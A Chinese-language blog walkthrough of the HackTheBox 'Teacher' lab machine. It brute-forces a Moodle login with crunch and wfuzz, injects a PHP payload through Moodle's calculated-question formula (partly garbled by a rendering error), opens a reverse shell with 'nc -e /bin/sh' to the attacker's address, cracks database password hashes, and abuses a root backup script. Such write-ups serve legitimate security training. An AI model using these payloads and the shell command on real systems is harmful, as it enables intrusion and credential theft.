No.146-HackTheBox-Linux-Teacher-Walkthrough渗透学习

**

HackTheBox-Linux-Teacher-Walkthrough

**

靶机地址：https://www.hackthebox.eu/home/machines/profile/165
靶机难度：中级（5.0/10）
靶机发布日期：2019年4月21日
靶机描述：
Teacher is a “medium” difficulty machine, which teaches techniques for identifying and exploiting logical flaws and vulnerabilities of outdated modules within popular CMS (in this instance Moodle), enumeration of sensitive information within the backend database and leverage misconfigurations on the operating system, which lead to a complete compromise of a system.

作者：大余
时间：2020-06-24

请注意：对于所有这些计算机，我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

可以看到靶机的IP是10.10.10.153…

nmap仅发现开放了80端口…

进入了Blackhat highschool页面…

检查Gallery模块发现了一些老师的人脸图片…

检查前端源码，发现了5.png的属性为That’s an F…下载下来看看

下载后，发现了这是一段话，这里获得了用户名和密码提示…说Th4C00lTheacha密码缺少最后一位字符…

命令：sudo crunch 15 15 -t Th4C00lTheacha^ -o passwd.txt
利用crunch来组合最后一个字符的字典文本…

有了用户名和密码本，需要找到登陆用户页面…
在**目录中发现了moddle页面…

该页面正好是我需要的登陆页面…开始**密码即可

命令：wfuzz -c -u http://10.10.10.153/moodle/login/index.php -d 'username=Giovanni&password=FUZZ' -w passwd.txt --hh 440
利用hadry或者Wfuzz模糊查找正确密码即可…获得了正确的密码

成功登陆…处于Giovanni权限管理页面中，这是moodle的框架页面…

https://blog.ripstech.com/2018/moodle-remote-code-execution/
google搜索了moodle exploit发现了一些漏洞和利用文章…这里提示了如何提权…


打开编辑…

创建课程…

填写课程信息…

保存…

点击edit quiz…


选择问题类型Calculated…

继续补充信息…

这里填写的是答案的公式…根据前面文章的提示，填写/*{x}{a*/KaTeX parse error: Expected 'EOF', got '}' at position 16: _GET[0]`/*(1)//}̲{a*/`_GET[0]/*({x})//}*/
意思是通过代码将url的参数传递出系统命令为0，然后可以写入任意的shell…

点击Next Page进入易受攻击的页面…

命令：&0=(nc -e /bin/sh 10.10.14.51 6666)
写入简单shell即可…

开启监听，获得了反向外壳…

枚举了一会，发现了数据库的用户名和密码…

登陆数据库，查找moodle库的信息，看能找到对应的用户名和密码吗…

找到了四个用户名和密码…
前三个密码都无法**…

giovanni的密码为md5值…获得了expelled密码信息…

su获得了giovanni权限外壳…读取到了user_flag信息…

上传了LinEnum枚举靶机，没发现可利用的地方…
查看进程发现，backup.sh脚本以root权限执行…

这里最主要的是，脚本backup可更改当前目录…然后赋予777权限…
意思是用户以root权限为标准，可以读取，写入和执行任何文件到/home/giovanni/work/tmp中…
那这里思路挺多的，快速获得flag，只需要把root目录赋予到tmp即可查看…
想要获取root权限，只需要将/etc的passwd的密码值赋予权限，并修改就能获得权限…

最近快速过靶机，直接获root_flag信息…

我反思了下，最近的文章都是一句话解答，很简单的就带过了一些技术和工具，没有去过多的解释，甚至有些命令也没有写到文章中，但是在图片中都会显示出来…因为感觉变简单了，没耐心详细解答了，希望小伙伴看到后面的文章，能耐心的google或者百度不会的工具或者技术问题，实在解答不了的，直接加本人微信，有问必答…加油

由于我们已经成功得到root权限查看user和root.txt，因此完成这台中级的靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。